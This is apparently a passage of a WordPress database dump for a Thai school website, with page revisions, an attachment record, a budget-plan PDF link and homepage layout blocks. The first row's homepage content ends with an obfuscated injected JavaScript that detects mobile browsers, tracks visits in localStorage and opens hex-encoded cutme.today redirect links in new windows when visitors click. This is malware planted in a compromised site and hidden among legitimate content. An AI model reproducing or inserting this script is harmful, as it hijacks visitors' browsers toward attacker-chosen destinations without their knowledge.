_0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-08 11:16:12','2025-07-08 04:16:12','',14,'http://pakhaeng.ssk.in.th/?p=1759',0,'revision','',0),
(1760,1,'2025-07-08 11:36:29','2025-07-08 04:36:29','','Screenshot 2025-07-08 113208','','inherit','','closed','','screenshot-2025-07-08-113208','','','2025-07-08 11:36:29','2025-07-08 04:36:29','',1754,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Screenshot-2025-07-08-113208.png',0,'attachment','image/png',0),
(1761,1,'2025-07-08 11:36:43','2025-07-08 04:36:43','<!-- wp:image {\"id\":1760,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Screenshot-2025-07-08-113208-1024x256.png\" alt=\"\" class=\"wp-image-1760\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี\"></object><a id=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\">Download</a></div>\n<!-- /wp:file -->','แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','closed','closed','','1754-revision-v1','','','2025-07-08 11:36:43','2025-07-08 04:36:43','',1754,'http://pakhaeng.ssk.in.th/?p=1761',0,'revision','',0),
(1762,1,'2025-07-08 11:36:44','2025-07-08 04:36:44','<!-- wp:image {\"id\":1760,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Screenshot-2025-07-08-113208-1024x256.png\" alt=\"\" class=\"wp-image-1760\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี\"></object><a id=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\">Download</a></div>\n<!-- /wp:file -->','แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','closed','closed','','1754-revision-v1','','','2025-07-08 11:36:44','2025-07-08 04:36:44','',1754,'http://pakhaeng.ssk.in.th/?p=1762',0,'revision','',0),
(1763,1,'2025-07-08 11:42:42','2025-07-08 04:42:42','<!-- wp:image {\"id\":1760,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Screenshot-2025-07-08-113208-1024x256.png\" alt=\"\" class=\"wp-image-1760\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี\"></object><a id=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-817e6856-41f6-43a9-a522-123e90295a52\">Download</a></div>\n<!-- /wp:file -->','แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','closed','closed','','1754-revision-v1','','','2025-07-08 11:42:42','2025-07-08 04:42:42','',1754,'http://pakhaeng.ssk.in.th/?p=1763',0,'revision','',0),
(1764,1,'2025-07-08 13:15:20','2025-07-08 06:15:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure 